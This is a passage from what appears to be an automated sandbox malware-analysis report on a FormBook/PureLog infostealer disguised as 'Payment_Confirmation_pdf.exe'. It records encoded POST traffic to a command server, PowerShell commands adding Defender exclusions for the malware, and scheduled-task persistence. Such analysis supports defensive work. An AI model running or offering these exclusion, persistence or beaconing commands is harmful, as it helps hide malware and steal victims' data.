73 53 55 68 31 59 2b 77 55 4b 57 38 31 57 78 6a 55 33 59 78 42 78 64 6d 68 6b 7a 4e 52 76 47 33 58 64 52 53 4b 79 50 58 55 59 57 6c 6a 72 55 66 4a 36 77 76 66 52 2f 6c 65 6f 72 43 46 6a 6a 7a 46 77 30 4b 30 5a 73 73 75 4e 35 66 4e 36 71 57 52 41 52 48 44 43 53 72 7a 52 66 59 66 6f 78 51 72 45 6c 42 78 2b 62 4d 70 64 71 53 77 3d 3d Data Ascii: d0s=jqt99MjWZV2mx+/GW+OKCYy+tncv+/X+hrq4spDdWhg604DuTzAQAudXcfP0aaFAPie4vwmxNmoGCxRBkZA4+nJ/ycKSIYOLD3s4hsSUh1Y+wUKW81WxjU3YxBxdmhkzNRvG3XdRSKyPXUYWljrUfJ6wvfR/leorCFjjzFw0K0ZssuN5fN6qWRARHDCSrzRfYfoxQrElBx+bMpdqSw==
Nov 27, 2024 08:56:17.723216057 CET	533	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Nov 2024 07:56:17 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.7	49996	209.74.77.108	80

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:56:21.181942940 CET	824	OUT	POST /4wqa/ HTTP/1.1 Host: www.innovateideas.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.innovateideas.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 236 Connection: close Referer: http://www.innovateideas.xyz/4wqa/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 6a 71 74 39 39 4d 6a 57 5a 56 32 6d 77 65 76 47 55 64 6d 4b 54 6f 79 39 6f 6e 63 76 6c 76 58 36 68 72 6d 34 73 74 37 4e 57 79 45 36 74 5a 7a 75 53 78 6f 51 42 75 64 58 58 2f 50 39 55 36 46 66 50 69 53 77 76 78 71 78 4e 6d 38 47 43 30 74 42 6b 6f 41 33 73 48 4a 39 70 4d 4b 71 56 6f 4f 4c 44 33 73 34 68 73 57 36 68 31 51 2b 78 6b 36 57 36 57 4f 79 70 30 33 58 35 68 78 64 74 42 6b 76 4e 52 76 34 33 57 52 2f 53 4a 4b 50 58 56 49 57 6c 79 72 56 4d 70 36 32 78 76 52 75 6d 73 74 43 61 57 4c 41 7a 57 45 64 41 54 55 54 70 59 4d 62 46 76 32 47 49 41 34 71 44 42 6d 6b 38 56 4d 71 61 65 73 70 64 4a 77 45 65 47 62 78 42 37 38 75 45 46 42 31 65 4c 73 42 37 6d 49 52 61 59 78 7a 51 6e 77 32 52 54 73 3d Data Ascii: d0s=jqt99MjWZV2mwevGUdmKToy9oncvlvX6hrm4st7NWyE6tZzuSxoQBudXX/P9U6FfPiSwvxqxNm8GC0tBkoA3sHJ9pMKqVoOLD3s4hsW6h1Q+xk6W6WOyp03X5hxdtBkvNRv43WR/SJKPXVIWlyrVMp62xvRumstCaWLAzWEdATUTpYMbFv2GIA4qDBmk8VMqaespdJwEeGbxB78uEFB1eLsB7mIRaYxzQnw2RTs=
Nov 27, 2024 08:56:22.397032022 CET	533	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Nov 2024 07:56:22 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.7	49997	209.74.77.108	80

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:56:23.851372957 CET	1837	OUT	POST /4wqa/ HTTP/1.1 Host: www.innovateideas.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.innovateideas.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1248 Connection: close Referer: http://www.innovateideas.xyz/4wqa/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 6a 71 74 39 39 4d 6a 57 5a 56 32 6d 77 65 76 47 55 64 6d 4b 54 6f 79 39 6f 6e 63 76 6c 76 58 36 68 72 6d 34 73 74 37 4e 57 79 4d 36 78 2b 62 75 54 58 67 51 43 75 64 58 4d 66 50 34 55 36 46 57 50 69 61 30 76 78 32 4c 4e 6b 45 47 42 57 56 42 74 38 73 33 6e 48 4a 39 32 63 4b 52 49 59 4f 53 44 33 64 51 68 73 47 36 68 31 51 2b 78 6d 79 57 74 56 57 79 36 6b 33 59 78 42 77 4a 6d 68 6b 54 4e 52 57 44 33 57 56 42 53 5a 71 50 58 31 34 57 6a 41 54 56 50 4a 36 30 77 76 51 7a 6d 74 52 5a 61 57 58 4d 7a 58 77 7a 41 55 59 54 6f 35 78 57 5a 2b 47 52 57 79 38 55 46 7a 75 68 36 54 4d 2f 63 4d 63 54 59 4b 64 67 44 55 50 6f 4e 4a 63 2f 42 78 4e 31 49 4e 55 4b 69 45 38 6c 5a 4f 49 58 43 6c 67 73 49 55 6a 36 75 44 37 66 5a 61 45 57 49 48 4f 59 57 36 77 63 6d 30 6f 32 69 6f 66 6c 49 45 70 74 4b 78 65 45 4b 4e 76 45 6b 38 6f 4d 56 70 58 4c 49 43 55 43 76 64 6b 67 53 46 6e 71 4d 62 6d 71 73 48 65 61 37 4a 78 41 77 5a 2f 55 65 66 4d 61 62 74 4f 66 79 36 38 47 5a 67 36 38 46 6f 32 54 59 30 31 2b 51 69 72 55 70 75 [TRUNCATED] Data Ascii: d0s=jqt99MjWZV2mwevGUdmKToy9oncvlvX6hrm4st7NWyM6x+buTXgQCudXMfP4U6FWPia0vx2LNkEGBWVBt8s3nHJ92cKRIYOSD3dQhsG6h1Q+xmyWtVWy6k3YxBwJmhkTNRWD3WVBSZqPX14WjATVPJ60wvQzmtRZaWXMzXwzAUYTo5xWZ+GRWy8UFzuh6TM/cMcTYKdgDUPoNJc/BxN1INUKiE8lZOIXClgsIUj6uD7fZaEWIHOYW6wcm0o2ioflIEptKxeEKNvEk8oMVpXLICUCvdkgSFnqMbmqsHea7JxAwZ/UefMabtOfy68GZg68Fo2TY01+QirUpuUj8ceVIrDkcWEwNS1XUOxrp8WVHmrB+iouOd82ZQfSdiu5myCmMtMRFMHLQunjT7NOg4czE96Zprq7qeHgmgttmzfn9J4lDI0D335naQBb6yJ4EQofsn3zi1rIEFgKq8tjXvB8TVavQGZpAUNhhzqOTWiG381aBZxjJ3qytO7az9JM8efCnMqgFp1CIXeZEPo99PjPm5oJLRK1AzIhlghmlpt0b7PEQoot2futHn22Oj7/DOBCTLEJV6S/SkTboVi+ZbwRBT6Q7uMyrMipFJHY69yxp86AFcmp0wAkQ4ufptA87JekSNyKZF441f9c0DMjgnf1t6f9snNze7Z6D7WpMCuNsagVGofF5x2u2CdF1FmizzgkwaluaYgf0ZMLxk6hejakj0+qQtkcT5vIg+eAcyBx9udyRd4PPDfLmuOsCjRbtMzhFwB37DyCXT7NtByvd30Oj4Czi9ov1Tet6zXYNSyo3Lzfrk5EPm1lNrxiCtPmtmhkU2A/oJQfIRBaGDpdPcZYNW5lexS+LYP0H7DDzV3jbvLx3hxpzuS3b6LtOvHZXonadsC1Y0oP4qODMYBjymo5GenyUW8Xl5vQQFvGv29ElR8+vJt+AknedHfga+N8yMHEcUNawuAEJZHlymb52s0AMQ449R5ba/3Etmo2RTx8icf0lNAZ [TRUNCATED]
Nov 27, 2024 08:56:25.102813959 CET	533	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Nov 2024 07:56:24 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Target ID:	0
Start time:	02:54:11
Start date:	27/11/2024
Path:	C:\Users\user\Desktop\Payment_Confirmation_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"
Imagebase:	0xc50000
File size:	861'704 bytes
MD5 hash:	DBB00CEAC5C3C668BDBB0C91DF825BE7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1427083355.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1429337605.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:54:18
Start date:	27/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"
Imagebase:	0x3d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:54:19
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:54:19
Start date:	27/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"
Imagebase:	0x3d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:54:19
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:54:19
Start date:	27/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"
Imagebase:	0xb50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:54:19
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:54:20
Start date:	27/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x8f0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:54:23
Start date:	27/11/2024
Path:	C:\Users\user\AppData\Roaming\cQwRvD.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\cQwRvD.exe
Imagebase:	0xeb0000
File size:	861'704 bytes
MD5 hash:	DBB00CEAC5C3C668BDBB0C91DF825BE7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:54:23
Start date:	27/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	04:39:30
Start date:	27/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp"
Imagebase:	0xb50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:39:30
Start date:	27/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:39:30
Start date:	27/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x1e0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:39:30
Start date:	27/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x6a0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:39:36
Start date:	27/11/2024
Path:	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe"
Imagebase:	0xff0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	04:39:38
Start date:	27/11/2024
Path:	C:\Windows\SysWOW64\sdiagnhost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\sdiagnhost.exe"
Imagebase:	0xc70000
File size:	31'744 bytes
MD5 hash:	76676F0A21E6AF109845151B3CEFE211
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	04:39:52
Start date:	27/11/2024
Path:	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe"
Imagebase:	0xff0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	04:40:05
Start date:	27/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	79
Total number of Limit Nodes:	8

Executed Functions

Function 013BD0B1 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 013BD13E
GetCurrentThread.KERNEL32 ref: 013BD17B
GetCurrentProcess.KERNEL32 ref: 013BD1B8
GetCurrentThreadId.KERNEL32 ref: 013BD211

Memory Dump Source

Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 352f4f5f9ddfd668d26d5d9c8935c95319fe78c4b0e35184e1494a8d8f1e8dd0
Instruction ID: 29ffd9ac12ed52b72e67b18aa712062a7a2d700e71eb48e94352319ef7e8eaee
Opcode Fuzzy Hash: 352f4f5f9ddfd668d26d5d9c8935c95319fe78c4b0e35184e1494a8d8f1e8dd0
Instruction Fuzzy Hash: 5A5165B0D003098FDB14DFA9D588BEEBBF1EF48318F208459E519AB3A0D7349845CB65

Function 013BD0C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 013BD13E
GetCurrentThread.KERNEL32 ref: 013BD17B
GetCurrentProcess.KERNEL32 ref: 013BD1B8
GetCurrentThreadId.KERNEL32 ref: 013BD211

Memory Dump Source

Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 204b3b8305a66625e9867d8fda5006eda3d4f56087cb13f14f4bdbccd9b75105
Instruction ID: ecaaaea524ece4329bc8ebe31b664d003daed2f59ba99843641b1801f8b7f60f
Opcode Fuzzy Hash: 204b3b8305a66625e9867d8fda5006eda3d4f56087cb13f14f4bdbccd9b75105
Instruction Fuzzy Hash: 425144B0D003498FDB14DFAAD588BEEBBF1EB88318F208459E519AB360D7749844CF65

Function 013BAE28 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013BB07E

Memory Dump Source

Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 153600fb44e139940db82fe68e3c0abbcc883036267465ce21f5f6589ba47c85
Instruction ID: b660193fb1f2936799ab4413269d629f4e762455384fe126020c13f40d7fc59c
Opcode Fuzzy Hash: 153600fb44e139940db82fe68e3c0abbcc883036267465ce21f5f6589ba47c85
Instruction Fuzzy Hash: 237148B0A00B058FD725DF29D49479ABBF1FF88304F00892DD69AD7A50E775E849CB90

Function 013B590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013B59C9

Memory Dump Source

Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 58eaf7a920e877ed6f430f323edc9c9efe520185fb27012f7471188d89bf810b
Instruction ID: 97d4f2504d2c4bdca929c36837a9c1b3c7ff6171916255d3be8aff7c4fe47859
Opcode Fuzzy Hash: 58eaf7a920e877ed6f430f323edc9c9efe520185fb27012f7471188d89bf810b
Instruction Fuzzy Hash: 3441F1B0C0171DCBEB25DFA9C884BCDBBB6BF49304F20806AD509AB251DB75694ACF50

Function 013B44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

